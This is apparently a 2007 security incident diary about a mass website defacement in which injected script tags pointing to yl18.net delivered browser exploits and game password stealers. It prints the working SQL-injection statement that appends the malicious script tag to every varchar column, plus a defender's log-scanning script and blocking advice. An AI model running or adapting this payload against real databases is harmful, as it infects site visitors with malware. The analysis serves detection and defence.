yl18.net mass defacement

Published: 2007-11-06
Last Updated: 2007-11-07 09:03:51 UTC
by Maarten Van Horenbeeck (Version: 3)
3 comment(s)

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated here) had been injected into over 40 000 pages across the internet, covering around 150 domains that we know of so far.

<script src="hXXp://yl 18.net/0.js"></script>

This script generates a page containing several hidden iframe components. These link to other pages that contain browser-specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti-virus coverage differed greatly between the binaries. Below is the VirusTotal output for one sample:

Antivirus Version Last update Result
AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 9.0.0.4 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 6.2.9.117 2007.11.06 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul

This type of widespread attack can incur a serious toll and requires follow-up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the malicious code involved and distribute them to anti-virus vendors so they can build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Malicious domains are, however, generally paid for with fake credit cards, and if this can be identified, the registrar has the legal ability to disable the domain.

These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross-site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.

UPDATE:  A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which had been passed hex-encoded in a variable and decoded with CAST:

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

This code appends the malicious script tag to the contents of every varchar column in every user table (xtype 'U') of the database. It also explains why such a large number of pages per site have been affected: any page that renders one of those columns now carries the tag.
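As an added defender's example (not code from the diary or from the reader's report), the following Python decodes the hex-encoded CAST payload that such an injection leaves in a web server log line and flags it when the decoded statement carries the pattern above. The log line is constructed here, and the NVARCHAR (UTF-16LE) handling goes beyond the varchar case shown in the diary.

```python
import re
import urllib.parse

# The injection hides its statement in a hex literal: CAST(0x4445... AS VARCHAR(8000))
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE)
# Building blocks of a statement that rewrites every varchar column of every user table
PAYLOAD_MARKERS = ("sysobjects", "syscolumns", "xtype='u'", "<script")
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def decode_hex_sql(raw_request: str) -> list:
    """Decode each hex-encoded SQL statement hidden in a (possibly URL-encoded) request."""
    decoded = []
    for blob in HEX_CAST.findall(urllib.parse.unquote_plus(raw_request)):
        data = bytes.fromhex(blob)
        # NVARCHAR casts are UTF-16LE: for ASCII text every second byte is 0x00
        if data[1::2].count(0) > len(data) // 4:
            decoded.append(data.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(data.decode("latin-1"))
    return decoded


def find_injected_script(statement: str):
    """Return the src URL of the script tag the statement appends, or None."""
    low = statement.lower()
    if all(marker in low for marker in PAYLOAD_MARKERS):
        m = SCRIPT_SRC.search(statement)
        return m.group(1) if m else None
    return None


def scan_log_line(line: str):
    """Return the injected script URL if the log line carries such a payload, else None."""
    for stmt in decode_hex_sql(line):
        url = find_injected_script(stmt)
        if url:
            return url
    return None


# Constructed sample (not from the diary's logs): the statement above, hex-encoded as the web server would log it.
INJECTED_SQL = (
    "declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']"
    "=rtrim(convert(varchar,'+b.name+'))+''<script src=\"hxxp://yl18.net/0.js\"></script>'';'"
    " from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'"
    " and b.xtype=c.xtype and c.name='varchar';set @m=REVERSE(@m);exec(@m);"
)
SAMPLE_LOG_LINE = (
    "2007-11-06 10:12:31 GET /news.asp id=1;DECLARE%20@S%20VARCHAR(8000);SET%20@S=CAST(0x"
    + INJECTED_SQL.encode("latin-1").hex() + "%20AS%20VARCHAR(8000));EXEC(@S);-- 200"
)
```

Run `scan_log_line` over each line of the web server log; a non-None result is the URL the attacker tried to plant and a pointer to which request parameter was injectable.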

--
Maarten Van Horenbeeck


Comments

FYI, a quick hack for devices like Cisco PIX/ASA (no DNS lookup) is to make an ACL that blocks something like 1.1.1.1 to all on your outbound, then set up the offending domain (in this case, yl18.net) on your internal DNS servers. Make anything at that domain resolve to 1.1.1.1 and not only will it be blocked, but you can have the device write an event any time that ACL is hit.
You might want to check your logs to see if anyone has gone to 125.65.77.25 (where that domain resolves to). We found a few hits to it within the last week and are doing follow-ups.
For those of you who are interested, there was a handler diary back in Feb 6th, 2007 by Donald Smith which talked about an 8.js code-injection/site defacement. www.zj5173.com noted on that diary entry also resolves to the same IP 125.65.77.25.

http://www.dshield.org/diary.html?storyid=2178
